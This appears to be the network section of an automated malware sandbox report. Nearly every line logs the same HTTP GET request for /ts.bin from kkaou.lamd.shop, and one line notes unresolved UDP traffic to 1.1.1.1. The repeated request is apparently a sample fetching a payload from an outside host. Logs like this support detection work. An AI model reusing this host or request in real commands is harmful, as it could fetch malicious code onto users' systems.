      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
